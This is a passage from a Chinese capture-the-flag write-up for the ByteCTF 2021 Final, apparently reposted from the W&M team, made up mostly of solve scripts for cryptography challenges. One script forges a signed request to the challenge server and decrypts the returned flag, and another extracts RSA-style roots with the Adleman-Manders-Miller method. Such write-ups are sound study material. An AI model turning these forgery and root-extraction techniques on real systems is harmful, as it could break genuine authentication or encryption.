Q_P = Make_Point(Q_P_hex)
M = Make_Point(M_hex)
Z = Make_Point(Z_hex)
K = Make_Point(K_hex)
s = int(s_hex, 16)
e = int(e_hex, 16)
f = int(f_hex, 16)
v = int(v_hex, 16)
mycurve = curve()
n = mycurve.order
G = mycurve.G

def get_pubkey():
    r = requests.get(url+'forgery/pks')
    data = r.text.split(',')
    pubkey = [Point(int(i[:64], 16), int(i[64:], 16)) for i in data]
    return pubkey

def connect(req):
    return requests.get(url+'forgery/req',data=req).text

pubkey = get_pubkey()
for Q_o in pubkey:
    R = s * G + e * get_Negate(Q_P) + e * Q_o + Z
    tmp = get_x(R) + get_x(M)
    if H(tmp) == e:
        # print(Q_o)
        break

a, b, m, s = (randint(1, n) for i in range(4))
M = m * G
R = b * G + (a+b) * get_Negate(Q_P) + a * get_Negate(K + K.x * Q_o)
e = H(get_x(R) + get_x(M))
Z = R + get_Negate(s * G + e * Q_o + e * get_Negate(Q_P))

resp = connect(str(M) + str(Z) + hex(s)[2:] + hex(e)[2:])
L, C = resp[:128], long_to_bytes(int(resp[128:], 16))
Y = m * Make_Point(L)
sk = long_to_bytes(H(get_x(Y)))
iv, cipher, tag = C[:12], C[12:-16], C[-16:]
cip = AES.new(sk, AES.MODE_GCM, iv)
plaintext = cip.decrypt_and_verify(cipher, tag)
print(plaintext)

GodOnlyKnows

因为p和q都比m大,所以 $m \quad mod \quad p =m$

因为 e|(q-1),所以采用AMM算法直接开根

第一个E可以分解,所以分两次开根

第二个开根后寻找多解即可

from Crypto.Util.number import long_to_bytes
from tqdm import tqdm
import random
import time

def AMM(o, r, q):
    start = time.time()
    # print('\n----------------------------------------------------------------------------------')
    # print('Start to run Adleman-Manders-Miller Root Extraction Method')
    # print('Try to find one {:#x}th root of {} modulo {}'.format(r, o, q))
    g = GF(q)
    o = g(o)
    p = g(random.randint(1, q))
    while p ^ ((q-1) // r) == 1:
        p = g(random.randint(1, q))
    # print('[+] Find p:{}'.format(p))
    t = 0
    s = q - 1
    while s % r == 0:
        t += 1
        s = s // r
    # print('[+] Find s:{}, t:{}'.format(s, t))
    k = 1
    while (k * s + 1) % r != 0:
        k += 1
    alp = (k * s + 1) // r
    # print('[+] Find alp:{}'.format(alp))
    a = p ^ (r**(t-1) * s)
    b = o ^ (r*alp - 1)
    c = p ^ s
    h = 1
    for i in range(1, t):
        d = b ^ (r^(t-1-i))
        if d == 1:
            j = 0
        else:
            # print('[+] Calculating DLP...')
            j = - discrete_log(d, a)
            # print('[+] Finish DLP...')
        b = b * (c^r)^j
        h = h * c^j
        c = c^r
    result = o^alp * h
    end = time.time()
    # print("Finished in {} seconds.".format(end - start))
    # print('Find one solution: {}'.format(result))
    return result

def findAllPRoot(p, e):
    print("Start to find all the Primitive {:#x}th root of 1 modulo {}.".format(e, p))
    start = time.time()
    proot = set()
    while len(proot) < e:
        proot.add(pow(random.randint(2, p-1), (p-1)//e, p))
    end = time.time()
    print("Finished in {} seconds.".format(end - start))
    return proot

def findAllPRoot(p, e):
    # print("Start to find all the Primitive {:#x}th root of 1 modulo {}.".format(e, p))
    start = time.time()
    proot = set()
    while len(proot) < e:
        proot.add(pow(random.randint(2, p-1), (p-1)//e, p))
    end = time.time()
    # print("Finished in {} seconds.".format(end - start))
    return proot

def findAllSolutions(mp, proot, cp, p):
    # print("Start to find all the {:#x}th root of {} modulo {}.".format(e, cp, p))
    start = time.time()
    all_mp = set()
    for root in proot:
        mp2 = mp * root % p
        assert(pow(mp2, e, p) == cp)
        all_mp.add(mp2)
    end = time.time()
    # print("Finished in {} seconds.".format(end - start))
    return all_mp

c = 772565936593515938615082083850938362613089734342287771128291472104046319862613350056956062118550321631866813148814858579940359488835406488192045892079962698714252480664060419953439936847467151951707711960564168524184204271995270327245725984919428149639973357868675592483006928997726613457380488261635041869597307398729507697158613168850704328530399405169680463230053377431335337779463633029295955858696902803386120356749863623596613941801330124207586725374756181745511923539633446661442068957315168820238937280405617065015285700322895085706754898061230539082769025995120039459396808799117648271570269985484502094854
p = 95687551158424870143703739707287468414611369850139196417287508089211979118193675929506850803149358301728120409275929342331337905599313606088428402839878372487170692490462929725396373203204226843802423181196898778481793325131946863940863769074896156910428463093571864657722422072768906417568334359470218805533
e = 211
cp = c % p
mp = AMM(cp, e, p)
mp = 31345202442790442920115697500450071818235900375500159009967056807830626140001529729676300258209996171069560742047328078130191327123345680723213339636646321741052218138744674334328183312558923865595390705797974430312426267394255850679294885677465520683090066528255100591795102268647400226323338312621641629616
p_proot = findAllPRoot(p, e)
mps = findAllSolutions(mp, p_proot, cp, p)
e = 44111
p_proot2 = findAllPRoot(p, e)
for i in tqdm(mps):
    ans = AMM(i, e, p)
    roots = findAllSolutions(ans, p_proot2, i, p)
    for j in roots:
        tmp = long_to_bytes(j)
        if tmp[:1] == b'(' and tmp[-1:] == b')' and b', ' in tmp:
            print(tmp)
from Crypto.Util.number import bytes_to_long, long_to_bytes

A = 792238572269794055348910087761887177847370603197600830370527259419768807858348001691036300215434808111877711734709055694630017772989997444234251
q = 1681729884196728426347201605286291421761851787915662035433940062673379044738871872632638818413406117567884236926797281113873191085369214060655427

ms = b'\xdd\x13\xb3\x03\xbbeX4\x96 \xd4f\xff\xbfX",\xeac\x08\xa1O\xacdx\xf6\x98\xc7%.r\xf6[\n\xa2\x0f\xa0\xbf\x9a\xe4yJ\xe3\xf9\xd4\xad\xd9\t\x14N\xd2]\xb3\\q0_\xe0z\xf3'
y = b'O\xce8?\xd1\xc3\x02\xd7\xb7\xd7\xe7\x91\xc1\xe6\xe5i\x817h\x02\x1b\xccw-\x88*W\x03\xc8\x91\x80\xf2\x13\t\xab\x92\xf9M\xf7f\xfb\xef,\x0fD"\x9fx\xf0T\xcbd\x0c\xc2Q^\xda\xbb\xa8^'
ms = bytes_to_long(ms)
y = bytes_to_long(y)
secret = y - (A * q) % ms
print(long_to_bytes(secret))

FROM : wm-team.cn

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月13日22:05:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ByteCTF 2021 Final By W&Mhttps://cn-sec.com/archives/3165725.html

发表评论

匿名网友 填写信息